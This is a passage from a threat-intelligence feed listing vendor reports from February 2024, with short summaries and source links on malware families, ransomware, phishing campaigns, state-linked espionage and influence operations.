Summary:: Trend Micro's investigation has uncovered a cyber espionage campaign by Earth Lusca, a China-linked threat actor, exploiting Chinese-Taiwanese tensions. Active around the Taiwanese national elections in late 2023 to early 2024, the campaign used spear-phishing with geopolitical lures to deliver a complex, multi-stage infection process, ultimately deploying Cobalt Strike payloads. Further analysis suggests a link between Earth Lusca and the Chinese company I-Soon, indicating a broader network of cyber espionage tied to Chinese interests. This campaign highlights the ongoing risks of state-linked cyber operations targeting politically sensitive entities.

Source: https://www.trendmicro.com/en_us/research/24/b/earth-lusca-uses-geopolitical-lure-to-target-taiwan.html

Intel Source:: Esentire

Intel Name:: Blind_Eagle_Targets_Manufacturing_with_Advanced_Crypters_and_Payloads

Date of Scan:: 2024-02-26

Impact:: LOW

Summary:: Blind Eagle threat actors have been observed targeting the manufacturing sector, distributing malicious VBS files through phishing emails containing links to RAR and BZ2 archives. They observed Blind Eagle threat actor(s) targeting Spanish-speaking users in the manufacturing industry based in North America.

Source: https://www.esentire.com/blog/blind-eagles-north-american-journey

Intel Source:: ASEC

Intel Name:: Uncovering_Nood_RAT_Persistent_Linux_Threat

Date of Scan:: 2024-02-26

Impact:: MEDIUM

Summary:: The AhnLab Security Intelligence Center (ASEC) has reported the discovery and ongoing analysis of Nood RAT, a Linux-targeting malware variant of the widely known Gh0st RAT. Originating from a lineage of malware with open-source roots primarily utilized by Chinese-speaking threat actors, Nood RAT has been actively used in cyber attacks since 2018, exploiting vulnerabilities across various systems. This malware exhibits sophisticated capabilities, including masquerading as legitimate processes, encrypted communication with command and control (C&C) servers, and executing malicious activities such as file manipulation and proxy usage. Despite its simplicity, Nood RAT's evasion techniques and the breadth of its deployment highlight the critical need for up-to-date system security and vigilant monitoring to combat such threats.

Source: https://asec.ahnlab.com/en/62144/

Intel Source:: Stratosphereips Blog

Intel Name:: Analysis_of_the_PyRation_family_malware

Date of Scan:: 2024-02-26

Impact:: LOW

Summary:: Stratosphereips researchers wrote the blog about the technical analysis of malware they link to the variant of the “PyRation” family. This malware is a Python executable packaged as a Windows PE file, meaning it works only on Windows.

Source: https://www.stratosphereips.org/blog/2024/2/23/analysis-and-understanding-of-malware-of-the-pyration-family

Intel Source:: Talos

Intel Name:: TikTok_Misinformation_Combat

Date of Scan:: 2024-02-26

Impact:: LOW

Summary:: The article discusses TikTok's efforts to address misinformation and disinformation on their platform, emphasizing that this is a global issue. It also mentions the use of Google Cloud Run for distributing malware and provides updates on cybersecurity news and events.

Source: https://blog.talosintelligence.com/threat-source-newsletter-feb-22-2024/

Intel Source:: Cyfirma

Intel Name:: A_new_remote_access_trojan_Xeno_RAT

Date of Scan:: 2024-02-26

Impact:: LOW

Summary:: Cyfirma provided deep analyses on the proliferation of Xeno RAT malware, crafted with advanced functionalities, conveniently accessible at no cost on GitHub. Xeno RAT possesses sophisticated functionalities and characteristics of advanced malware. A threat actor customized its settings and disseminated it via the Discord CDN.

Source: https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access-trojan-with-advance-capabilities/

Intel Source:: CERT-UA

Intel Name:: Targeted_Cyber_Attack_Against_Ukrainian_Defense_Forces_Thwarted

Date of Scan:: 2024-02-26

Impact:: LOW

Summary:: Ukrainian cybersecurity teams thwarted a targeted cyber attack against the Ukrainian Defense Forces, delivered via a malicious Excel document spread through Signal messenger. The attack involved a complex chain of actions including the execution of a malicious PowerShell script, COOKBOX, designed to compromise and control affected systems. The attack, part of ongoing efforts since autumn 2023, exploited systems lacking basic security measures. The response highlighted the critical role of advanced security technologies like EDR in preventing such breaches and underscored the necessity for immediate implementation of comprehensive security policies to protect against sophisticated cyber threats.

Source: https://cert.gov.ua/article/6277849

Intel Source:: Esentire

Intel Name:: The_DarkVNC_Technical_Analysis

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: DarkVNC is a hidden utility based on VNC technology, used for stealthy remote access. It was advertised in 2016 and received updates until 2017. DarkVNC has been used by threat actors associated with IcedID and SolarMarker campaigns. This analysis focuses on a DarkVNC sample that uses 'vncdll64.dll' for exporting functions. It generates a unique ID to send to the C2 server along with system info. DarkVNC can search for and manipulate windows related to the desktop environment. It can also control the state of devices like keyboard and mouse, and block user input. The malware gathers details on the Chrome browser install and runs cmd prompts. Detection and prevention controls like EDR solutions and training programs are recommended.

Source: https://www.esentire.com/blog/technical-analysis-of-darkvnc

Intel Source:: Uptycs

Intel Name:: 8220_Group_Gang_Launches_Cryptomining_Campaign

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: Uptycs researchers have discovered a new cryptomining campaign conducted by the 8220 Group, targeting both Linux and Windows systems. This recent campaign stands out due to the use of Windows PowerShell for fileless execution, resulting in the deployment of a cryptominer. What distinguishes this campaign is its adoption of unique techniques, such as DLL sideloading, User Account Control (UAC) bypass, and modifications to AMSIscanBuffer and ETWEventWrite. These tactics represent a novel approach, highlighting the group's innovative methods to enhance stealth and evasion, setting it apart from previous incidents. Notably, the Linux campaign showed no significant alterations in its tactics.

Source: https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat

Intel Source:: Esentire

Intel Name:: The_Pikabot_rising_threat

Date of Scan:: 2024-02-23

Impact:: MEDIUM

Summary:: The article "The Rising Threat of Pikabot" by eSentire discusses the increasing danger of the Pikabot malware and the capabilities of eSentire's 24/7 Security Operations Centers (SOCs) in responding to threats. The article also highlights the TRU team's discovery of other dangerous threats, such as the Kaseya MSP breach and the more_eggs malware. The article provides a detailed analysis of the Pikabot malware, including its initial infection through a phishing email and its use of obfuscation techniques. It also explains how Pikabot is injected into the SearchProtocolHost.exe process and its functionality to gather host information and check for specific language settings. The article also discusses additional insights, such as unsuccessful infection attempts and recommendations from the TRU team for the prevention and detection of Pikabot.

Source: https://www.esentire.com/blog/the-rising-threat-of-pikabot

Intel Source:: Crowdstrike

Intel Name:: LATAM_Malware_Variants

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: The article provides an overview of updates and changes made to various malware families targeting users in Latin America (LATAM) in 2023. These include Mispadu, Kiron, Caiman, Culebra, Salve, and Astaroth, which primarily target users in Brazil, Spain, Italy, and Australia. The updates include the use of CAPTCHAs, new components in the infection chain, and new obfuscation methods. The article also discusses the potential overlap between Mispadu and Astaroth, as well as a new threat called Doit. It then delves into the technical details of these malware variants, including encryption and decryption methods, deployment chains, and C2 protocols. The article also provides recommendations to avoid or detect eCrime commodity malware infections and lists indicators of compromise. It concludes by discussing a new Brazilian-based adversary, SAMBA SPIDER, and providing details on specific malware families and their tactics, techniques, and procedures. The article also includes a case study of updates made to the Caiman downloader in September 2023.

Source: https://www.crowdstrike.com/blog/latin-america-malware-update/

Intel Source:: Sucuri

Intel Name:: Angel_Crypto_Drainer

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: The article discusses the growing threat of Web3 crypto malware, specifically the Angel Drainer, which targets individuals interested in cryptocurrencies and NFTs. The authors provide an overview of the current list of top level domains maintained by IANA and mention a placeholder domain used by the malware. They also discuss the use of the "Ipsum" domain in phishing sites and the high number of scans recorded by URLScan.io. The article provides statistics on the number of unique domain names and titles associated with the malware, as well as the top three second level domains used. It also discusses the steps website owners can take to protect their sites from these types of attacks. The authors then delve into the specifics of the Angel Drainer malware, including its use of crypto drainers to steal and redistribute assets from compromised wallets. They also mention the surge in malicious activity linked to recent security breaches and the use of phishing tactics to trick users into giving up their cryptocurrency assets. The article also discusses the benefits of using a web application firewall and offers services to remove malware infections and secure websites. The authors provide an analysis of the threat of malicious injections in the Web3 ecosystem and describe a specific malware injection targeting WordPress sites. They also discuss the various waves of attacks carried out by the Angel Drainer malware and provide information on the top 50 most common titles for phishing pages used by the drainer. The article also mentions the use of an ACCESS_KEY by the drainer and its connection to the Rilide Stealer. It also provides information on phishing subdomains on the website Vercel.app and the number of phishing web.app subdomains found in relation to Firebase Hosting. The authors also discuss a new type of malware that targets Web3 crypto users and provides details on the different versions of the malware. They also mention the investigation into a malware that impersonates the BillionAir Web3 gambling platform and provide information on suspicious requests made by the drainer. The article concludes by mentioning the 530 phishing pages found on subdomains of the website pages.dev, which is hosted on Cloudflare Pages.

Source: https://blog.sucuri.net/2024/02/web3-crypto-malware-angel-drainer.html

Intel Source:: Cofense

Intel Name:: New_MaaS_InfoStealer_Malware_Campaign

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: Cofense researchers discussed in their post a new phishing campaign targeting the oil and gas industry, which uses a recently updated Malware-as-a-Service called Rhadamanthys Stealer. The campaign starts with a phishing email and leads to a clickable PDF file that downloads the malware. The Rhadamanthys Stealer is written in C++ and has various features to steal information. The article also mentions that the malware recently received a major update, making it more customizable for threat actors. A table of indicators of compromise is provided, and the article concludes by stating that more details will be provided in the future.

Source: https://cofense.com/blog/new-maas-infostealer-malware-campaign-targeting-oil-gas-sector/

Intel Source:: ISC.SANS

Intel Name:: Anti_Sandbox_Techniques

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: ISC.SANS researchers have examined a malware sample and discovered that several methods rely on simple checks that are easily performed in a simple Windows script (.bat) file. Additionally, they came over an intriguing one that downloads the subsequent payload after doing a simple check.

Source: https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/

Intel Source:: Sentinel Labs

Intel Name:: Russian_Aligned_Influence_Operation_Affecting_German_Audiences

Date of Scan:: 2024-02-23

Impact:: LOW

Summary:: Researchers at SentinelLabs have closely monitored the activities of an alleged Russia-aligned influence operation network named Doppelgänger. Their observations reveal that Doppelgänger has been specifically targeting German audiences, a trend aligned with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.

Source: https://www.sentinelone.com/labs/doppelganger-russia-aligned-influence-operation-targets-germany/

Intel Source:: ASEC

Intel Name:: Kimsuky_abuses_a_valid_certificate_to_distribute_TrollAgent

Date of Scan:: 2024-02-23

Impact:: MEDIUM

Summary:: A malicious TrollAgent malware was found to be downloaded when attempting to install security software from a South Korean construction association website. The malware can steal information and receive commands from attackers. Users should keep antivirus software updated to prevent infection.

Source: https://asec.ahnlab.com/ko/61666/

Intel Source:: Medium

Intel Name:: Konni_RAT_Malware_Backdoored_into_Russian_Government_Software

Date of Scan:: 2024-02-22

Impact:: LOW

Summary:: A backdoor has been included in an installer for a utility that is probably used by the Ministry of Foreign Affairs (MID)'s Russian Consular Department to distribute the remote access trojan Konni RAT (also known as UpDog). As per DCSO experts, the Konni RAT package detected in software installers is a tactic that the gang used back in October 2023, when it was discovered that the trojan was being distributed using a Russian tax filing software called Spravki BK that had a backdoor. The utility named 'Statistika KZU' (Cтатистика ОЗY) appears to be the target of this backdoored installer.

Source: https://medium.com/@DCSO_CyTec/to-russia-with-love-assessing-a-konni-backdoored-suspected-russian-consular-software-installer-ce618ea4b8f3

Intel Source:: Malwarebytes

Intel Name:: Malware_Compromises_Personal_Data_Through_Vibrator_Infection

Date of Scan:: 2024-02-22

Impact:: LOW

Summary:: The article explores an incident involving the infection of a vibrator, specifically the Spencer's Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator, with an information stealer named Lumma. Lumma operates on a Malware-as-a-Service (MaaS) model, where cybercriminals acquire access to malicious software and its infrastructure by paying other cybercriminals. Lumma's primary function is to steal information from cryptocurrency wallets, browser extensions, and two-factor authentication details. While Lumma is commonly distributed through email campaigns, this case highlights its potential spread through infected USB drives as well.

Source: https://www.malwarebytes.com/blog/news/2024/02/vibrator-virus-steals-your-personal-information

Intel Source:: Trustwave

Intel Name:: A_discovery_of_the_phishing_as_a_service_Tycoon_Group

Date of Scan:: 2024-02-22

Impact:: LOW

Summary:: A phishing-as-a-service called Tycoon Group was discovered recently. It uses sophisticated techniques like WebSocket for data exfiltration and Cloudflare for evading detection. Available since August 2023, it enables easy deployment of phishing pages mimicking Microsoft and Google login. It provides an admin panel to manage campaigns and view stolen credentials.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/breakdown-of-tycoon-phishing-as-a-service-system/

Intel Source:: Aqua Sec

Intel Name:: DDoS_Botnet_Lucifer_Targeting_Apache_Big_Data_Stack

Date of Scan:: 2024-02-22

Impact:: MEDIUM

Summary:: Researchers from AquaSec have revealed a new effort that aims to take down the Apache Hadoop and Apache Druid big-data stacks. After more research, it was found that the attacker uses known vulnerabilities and misconfigurations in the Apache cloud honeypots to carry out the attacks.

Source: https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/

Intel Source:: Cisco Talos

Intel Name:: Malicious_Campaigns_Exploiting_Google_Cloud_Run_in_LATAM

Date of Scan:: 2024-02-21

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos have noticed that a number of banking trojans, including Astaroth (also known as Guildma), Mekotio, and Ousaban, are presently being distributed to targets throughout Europe and Latin America through the misuse of Google Cloud Run in high-volume malware distribution campaigns. Since September 2023, the amount of emails related to these initiatives has grown dramatically, and they are still always keeping an eye out for fresh email distribution programs. Malicious Microsoft Installers (MSIs), which serve as droppers or downloaders for the final malware payloads, are a feature of the infection chains linked to various malware families.

Source: https://blog.talosintelligence.com/google-cloud-run-abuse/

Intel Source:: Huntress

Intel Name:: Decrypted_HomuWitch_Ransomware

Date of Scan:: 2024-02-21

Impact:: LOW

Summary:: During the investigation of the threat, it was discovered the vulnerability, which allowed Hintress analysts to create a free decryption tool for all the HomuWitch victims. HomuWitch is a ransomware strain that initially emerged in July 2023. HomuWitch contains a vulnerability present during the encryption process that allows the victims to retrieve all their files without paying the ransom.

Source: https://malware.news/t/decrypted-homuwitch-ransomware/78949

Intel Source:: Lab52 blog

Intel Name:: The_deployment_of_the_Kazuar_malware

Date of Scan:: 2024-02-21

Impact:: LOW

Summary:: This article focuses on a new sample used by the Turla APT group in their attacks, which uses a wrapper called Pelmeni and deploys the Kazuar malware. The article compares this sample with a previous one and confirms the use of a substitution algorithm similar to Kazuar. It also discusses the use of a new protocol for exfiltration and a different log's folder. The article provides indicators of compromise and hashes for the samples used. The section titled "Pelmeni Wrapper" provides a detailed analysis of the wrapper, its structure, and functions. The article also discusses the Turla group's history and their use of the Sideload DLL technique. The following section delves into the analysis of the.NET binary extracted from the wrapper.

Source: https://lab52.io/blog/pelmeni-wrapper-new-wrapper-of-kazuar-turla-backdoor/

Intel Source:: Cado Security Labs

Intel Name:: Migo_Malware_Targeting_Redis_for_Cryptocurrency_Mining

Date of Scan:: 2024-02-21

Impact:: LOW

Summary:: Researchers from Cado Security Labs have encountered a new malware campaign that focuses on exploiting Redis for initial access. Although Redis has been a common target for Linux and cloud-centric attackers, this specific campaign employs unique system weakening techniques against the data store. The malware, known as Migo, is designed by its developers to compromise Redis servers with the goal of cryptocurrency mining on the underlying Linux host.

Source: https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/

Intel Source:: Reversing Labs

Intel Name:: Malicious_Actors_Exploiting_Open_Source_Code_in_Software_Supply_Chains

Date of Scan:: 2024-02-21

Impact:: LOW

Summary:: The article explores the growing trend of cybercriminals utilizing open-source code and package managers for malicious activities. Instead of relying on traditional methods like spearphishing, attackers are now planting malware in open-source repositories. The emergence of DLL sideloading attacks, typically associated with compromised environments, is now evident in open-source incidents. The identification of malicious PyPI packages underscores a broader pattern of cyber threats leveraging DLL sideloading to compromise software supply chains. This highlights the importance of increased security monitoring and integrity checks for both software producers and organizations.

Source: https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls

Intel Source:: Welivesecurity

Intel Name:: Information_Campaign_Regarding_War_That_Targets_Speakers_of_Ukrainian

Date of Scan:: 2024-02-21

Impact:: LOW

Summary:: Operation Texonto is a disinformation/PSYOP campaign that primarily distributes its message via spam emails. Remarkably, it doesn't appear that the offenders disseminated their statements via popular platforms like Telegram or phony websites. In November 2023 and at the end of December 2023, respectively, they identified two distinct waves. The emails' topics, which are common in Russian propaganda, included food shortages, medicine shortages, and heating outages.

Source: https://www.welivesecurity.com/en/eset-research/operation-texonto-information-operation-targeting-ukrainian-speakers-context-war/

Intel Source:: ISC.SANS

Intel Name:: Dynamic_Sandbox_Detection_in_Python_InfoStealer

Date of Scan:: 2024-02-20

Impact:: LOW

Summary:: Python-based infostealers are not new. Additionally, they incorporate several sandbox detection methods to evade execution (and likely detection) through automated analysis. Researchers from ISC.SANS discovered one last week that takes a similar but distinct method. Typically, the scripts include a list of "bad stuff" to look for, such as users, processes, MAC addresses, etc.

Source: https://isc.sans.edu/diary/Python+InfoStealer+With+Dynamic+Sandbox+Detection/30668/

Intel Source:: CyberGeeks

Intel Name:: The_technical_analysis_of_the_Backmydata_ransomware

Date of Scan:: 2024-02-20

Impact:: LOW

Summary:: The article provides a technical analysis of the BackMyData ransomware, which was used to attack hospitals in Romania. The Abstract section gives an overview of the ransomware's actions, including encryption of files using AES256 and dropping ransom notes. The Technical Analysis section delves into the ransomware's code and methods, such as disabling the firewall and deleting Volume Shadow Copies. It also explains how the ransomware establishes persistence and encrypts files with specific extensions. The article also provides indicators of compromise and references for further information on the ransomware.

Source: https://cybergeeks.tech/a-technical-analysis-of-the-backmydata-ransomware-used-to-attack-hospitals-in-romania/

Intel Source:: Cyble

Intel Name:: Advanced_version_of_ObserverStealer_AsukaStealer_malware

Date of Scan:: 2024-02-20

Impact:: MEDIUM

Summary:: The article discusses a new type of information-stealing malware called AsukaStealer, which is being offered as a service on Russian cybercrime forums. It is a revamped version of the ObserverStealer and uses tactics, techniques, and procedures (TTPs) identified by the MITRE ATT&CK framework, including credential access, discovery, and collection, as well as remote system discovery and data collection. The article also provides a list of indicators of compromise (IoCs) associated with AsukaStealer, such as IP addresses and file hashes.

Source: https://cyble.com/blog/asukastealer-a-revamped-version-of-the-observerstealer-advertised-as-malware-as-a-service/

Intel Source:: Google Blog

Intel Name:: Iranian_and_Hezbollah_Hackers_Attack_to_Influence_Israel_Hamas_Narrative

Date of Scan:: 2024-02-20

Impact:: MEDIUM

Summary:: Cybercriminals supported by Hezbollah and Iran orchestrated cyberattacks with the intention of eroding public support for the Israel-Hamas conflict following October 2023. This includes devasting attacks on important Israeli institutions, hack-and-leak schemes aimed at American and Israeli organizations, phishing scams intended to obtain intelligence, and disinformation tactics to sway public opinion against Israel. In the six months preceding the attacks on October 7, Iran was responsible for almost eighty percent of all government-sponsored phishing attempts directed towards Israel.

Source: https://blog.google/technology/safety-security/tool-of-first-resort-israel-hamas-war-in-cyber/

Intel Source:: BfV & NIS

Intel Name:: Hackers_from_North_Korea_Linked_to_Defense_Sector_Supply_Chain_Attack

Date of Scan:: 2024-02-20

Impact:: MEDIUM

Summary:: Both the National Intelligence Service (NIS) of South Korea and the Federal Intelligence Agency (BfV) of Germany have issued an advisory alert regarding an ongoing cyber-espionage campaign on behalf of the North Korean government that targets the global defense sector. The strikes are intended to steal information on cutting-edge military technology and assist North Korea in modernizing its conventional weapons and creating new military capabilities.

Source: https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2

Intel Source:: Sucuri

Intel Name:: RemoteRATRemoval_types_and_mitigation

Date of Scan:: 2024-02-20

Impact:: LOW

Summary:: The article titled "Remote Access Trojan (RAT): Types, Mitigation & Removal" provides a comprehensive overview of RATs, a type of malware that allows attackers to gain remote access and control over infected systems. The article discusses the various types of RATs, their infiltration techniques, command-and-control communication, and stealth mechanisms. It also highlights the dangers of RAT attacks, including data theft, botnets, and ransomware deployment. The article emphasizes the importance of website security in preventing the spread of RATs and provides tips for removing RATs and protecting against them. It also discusses the role of RATs in website security and provides examples of how websites can spread RAT infections. The article concludes by recommending website security best practices and the use of a web application firewall to protect against RATs.

Source: https://blog.sucuri.net/2024/02/remote-access-trojan-rat-types-mitigation-removal.html

Intel Source:: bleepingcomputer

Intel Name:: Hackers_Exploit_Critical_RCE_Flaw_In_Bricks_Builder_Theme

Date of Scan:: 2024-02-20

Impact:: LOW

Summary:: The article highlights the active exploitation of a significant vulnerability in the widely-used Brick Builder Theme for WordPress, boasting approximately 25,000 installations. This flaw permits RCE and the possible execution of harmful PHP code. The security concern arises from an eval function call within the 'prepare_query_vars_from_settings' function, providing an avenue for unauthorized users to exploit it. The Patchstack platform promptly reported the vulnerability to the Bricks team, resulting in the release of a fix in version 1.9.6.1 on February 13. Despite the absence of evidence of exploitation, users are strongly advised to upgrade to ensure heightened security.

Source: https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-rce-flaw-in-bricks-wordpress-site-builder/#google_vignette

Intel Source:: Trendmicro

Intel Name:: Earth_Preta_Campaign_Targets_Asian_Countries_with_DOPLUGS

Date of Scan:: 2024-02-20

Impact:: MEDIUM

Summary:: Researchers from TrendMicro have noted that the customized PlugX malware is not the same as the standard PlugX malware, which is merely used to download the latter and does not contain a finished backdoor command module. They chose to rename this piece of modified PlugX malware as DOPLUGS because of its unique features. Investigating further, they discovered that the KillSomeOne module was being used by the DOPLUGS malware.

Source: https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html

Intel Source:: ISC.SANS

Intel Name:: Attackers_Using_Mirai_Botnet_on_Open_Internet

Date of Scan:: 2024-02-19

Impact:: LOW

Summary:: ISC.SANS researchers have examined how hackers are utilizing the Mirai Botnet malware to target openly accessible Internet of Things devices and take advantage of security holes.

Source: https://isc.sans.edu/diary/MiraiMirai+On+The+Wall+Guest+Diary/30658

Intel Source:: Recorded Future

Intel Name:: TAG_70_Hackers_Targeting_European_Government_and_Military_Mail_Servers

Date of Scan:: 2024-02-19

Impact:: LOW

Summary:: Recorded Future researchers have spotted TAG-70 using cross-site scripting (XSS) vulnerabilities against European Roundcube webmail servers, specifically targeting organizations associated to national infrastructure, the military, and government. Activity reported by other security vendors with the identities Winter Vivern, TA473, and UAC-0114 overlaps with TAG-70. The organization has been active since at least December 2020 and mainly targets governments in Europe and Central Asia. It probably runs cyber-espionage operations to further the objectives of Belarus and Russia.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0217.pdf

Intel Source:: CyberMasterV

Intel Name:: An_Analysis_of_BackMyData_Ransomware_That_Attacked_Romanian_Hospitals

Date of Scan:: 2024-02-19

Impact:: LOW

Summary:: Researchers report that a ransomware attack that began on February 11 resulted in 100 hospitals in Romania to shut down their computer systems. The BackMyData ransomware, which claimed responsibility for it, is a member of the Phobos family. The malware included an AES key that is used to decrypt its configuration, which includes information on whitelisted files, directories, and extensions in addition to a public RSA key that is used to encrypt AES keys used to encrypt data.

Source: https://cybergeeks.tech/a-technical-analysis-of-the-backmydata-ransomware-used-to-attack-hospitals-in-romania/

Intel Source:: S2W Blog

Intel Name:: Cybercriminals_Using_RustDoor_and_GateDoor_as_Fake_Software

Date of Scan:: 2024-02-19

Impact:: LOW

Summary:: The Rust-based macOS malware known as RustDoor was identified and actively monitored by S2W's threat intelligence center in December 2023. They discovered the Windows version of RustDoor after additional investigation, and since it was created in Golang rather than Rust, they called it GateDoor. It has been verified that RustDoor and GateDoor are both issued as regular software updates or programs.

Source: https://medium.com/s2wblog/rustdoor-and-gatedoor-a-new-pair-of-weapons-disguised-as-legitimate-software-by-suspected-34c94e558b40

Intel Source:: Trellix

Intel Name:: Deep_Dive_into_MrAgent_and_Ransomware_Negotiations

Date of Scan:: 2024-02-19

Impact:: MEDIUM

Summary:: Ransomware-as-a-Service group known for its MrAgent tool, which automates ransomware deployment. Highlighting the group's focus on double extortion schemes, the analysis covers their targeting strategy, negotiation tactics with victims, and the technical workings of MrAgent. Additionally, it examines the financial trail of ransom payments, offering insights into the group's operational and financial tactics

Source: https://www.trellix.com/blogs/research/ransomhouse-am-see/

Intel Source:: Rapid7

Intel Name:: Unauthorized_access_to_two_publicly_facing_Confluence_servers

Date of Scan:: 2024-02-16

Impact:: MEDIUM

Summary:: Rapid7 Incident Response investigated an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation for CVE-2023-22527 within available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver Command and Control (C2) payload on in-scope servers.

Source: https://www.rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/

Intel Source:: SentinelLabs

Intel Name:: A_Novel_AWS_SNS_based_Smishing_Attack_Tool

Date of Scan:: 2024-02-16

Impact:: LOW

Summary:: SentinelLabs discovered SNS Sender, a pioneering tool exploiting AWS's Simple Notification Service (SNS) for smishing (SMS phishing) campaigns. Authored by ARDUINO_DAS, a figure already known in the phishing scene, this tool signifies a shift in how threat actors leverage cloud services for malicious activities. SNS Sender uniquely uses AWS SNS for bulk SMS spamming to distribute phishing links, often under the guise of USPS notifications about missed package deliveries.

Source: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/

Intel Source:: Malwarebytes

Intel Name:: The_spread_of_utility_scam_campaign_thru_online_ads

Date of Scan:: 2024-02-16

Impact:: LOW

Summary:: Malwarebytes blog shared a point of the problem of how it works and how criminals pretend to be the utility company so they can threaten and extort as much money from you as they can. And how analysts observed and collected many ads and fake sites of fraudulent utility scam ads.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/02/massive-utility-scam-campaign-spreads-via-online-ads

Intel Source:: Symantec

Intel Name:: Comparative_Analysis_of_Alpha_and_NetWalker_Ransomware_Versions

Date of Scan:: 2024-02-16

Impact:: LOW

Summary:: Analyzing Alpha reveals that it is a lot like the previous version of the NetWalker ransomware. The payload is delivered by a similar PowerShell-based loader in both threats. Furthermore, there is a substantial amount of code overlap between the payloads for Alpha and NetWalker.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/alpha-netwalker-ransomware

Intel Source:: Cisco Talos

Intel Name:: Agniane_information_stealer_malware

Date of Scan:: 2024-02-16

Impact:: LOW

Summary:: The Agniane Stealer is an information-stealing malware that attacks the cryptocurrency wallets of its victims. It was observed recently a campaign of these attacks and Cisco Talos analysts identified and detailed analysis of a previously unrecognized network URL pattern. Plus uncovered more information on the malware’s methods for file collection and the intricacies of its command and control (C2) protocol.

Source: https://blogs.cisco.com/security/agniane-stealer-information-stealer-targeting-cryptocurrency-users

Intel Source:: CERT-AGID

Intel Name:: TA544_Exploiting_Danabot_Malware_Again

Date of Scan:: 2024-02-16

Impact:: LOW

Summary:: Three months have passed since the last wave in November 2023, and there is still a significant effort targeting Italian users that uses the "Revenue Agency" concept to disseminate malware. This new threat seeks to install the Danabot malware on victims' devices in order to obtain unauthorized access to sensitive data. It has been identified as the work of the criminal group TA544, which is skilled in targeted attacks using spear phishing and social engineering and is notorious for spreading the Gozi Ursnif malware.

Source: https://cert-agid.gov.it/news/il-gruppo-ta544-cambia-ancora-strategia-sfruttando-lutilizzo-del-malware-danabot/

Intel Source:: Eclecticiq

Intel Name:: Advanced_Cybercriminals_rapidly_diversify_cyberattack_channels

Date of Scan:: 2024-02-15

Impact:: MEDIUM

Summary:: EclecticIQ analysts looked at recent Ivanti vulnerabilities and the infrastructure connected to the recent activities. The analysts described new, previously unreported infrastructure that may be linked to similar exploit attempts. EclecticIQ analysts looked at recent Ivanti vulnerabilities and the infrastructure tied to the earliest reporting.

Source: https://blog.eclecticiq.com/advanced-cybercriminals-rapidly-diversify-cyberattack-channels-following-public-vulnerability-disclosure

Intel Source:: Sentilone

Intel Name:: Kryptina_RaaS

Date of Scan:: 2024-02-15

Impact:: LOW

Summary:: Sentilone analysts detailed out in ther blogthe development, technicalities and implications of Kryptina RaaS and its move into open-source crimeware.

Source: https://www.sentinelone.com/blog/kryptina-raas-from-underground-commodity-to-open-source-threat/

Intel Source:: Huntress

Intel Name:: Data_Leakage_via_Finger

Date of Scan:: 2024-02-15

Impact:: LOW

Summary:: Researchers at Huntress have examined a Windows Defender detection from the past, or what they call a "Managed Antivirus" (MAV) warning, looking for the finger.exe command line that sent a series of digits to the IP address linked to the November activity.

Source: https://www.huntress.com/blog/threat-intel-accelerates-detection-and-response

Intel Source:: Fortinet

Intel Name:: TicTacToe_Dropper_Analysis

Date of Scan:: 2024-02-15

Impact:: MEDIUM

Summary:: While analyzing new malware samples collected from several victims, the FortiGuard researchers identified a grouping of malware droppers used to deliver various final-stage payloads throughout 2023.

Source: https://www.fortinet.com/blog/threat-research/tictactoe-dropper

Intel Source:: Cisco Talos

Intel Name:: TinyTurla_Next_Generation

Date of Scan:: 2024-02-15

Impact:: LOW

Summary:: Cisco Talos has observed a new backdoor managed by the Turla APT group, a Russian cyber espionage threat group. This new backdoor called “TinyTurla-NG” (TTNG) is similar to Turla’s another backddor, TinyTurla, in coding style and functionality implementation.

Source: https://blog.talosintelligence.com/tinyturla-next-generation/

Intel Source:: Zerofox

Intel Name:: New_Tax_Fraud_Scheme

Date of Scan:: 2024-02-15

Impact:: LOW

Summary:: This month the Russian threat actor “Journalist” shared a method of leveraging the legitimate gocardless[.]com service to discover corporate employee identification numbers (EINs) to perform tax fraud schemes against U.S. citizens, on the Russian-speaking community “Coockie Pro.”

Source: https://www.zerofox.com/blog/flash-report-new-tax-fraud-scheme-leveraging-employee-identification-numbers/

Intel Source:: Cyble

Intel Name:: A_new_sophisticated_GoBased_JKwerlo_ransomware_variant

Date of Scan:: 2024-02-14

Impact:: LOW

Summary:: Cyble researchers analyzed a new sophisticated Go-Based JKwerlo ransomware variant that attacked French And Spanish-speaking users.

Source: https://cyble.com/blog/new-go-based-jkwerlo-ransomware-poses-a-risk-to-french-and-spanish-users/

Intel Source:: Violexity

Intel Name:: CharmingCypress_malware_family

Date of Scan:: 2024-02-14

Impact:: LOW

Summary:: The Violexity's post was published to share the observation of CharmingCypress malware family activity from 2023 to early 2024 including details on techniques the threat actor has used to distribute them.

Source: https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/

Intel Source:: Cyfirma

Intel Name:: Malware_spread_via_YouTube_Videos

Date of Scan:: 2024-02-14

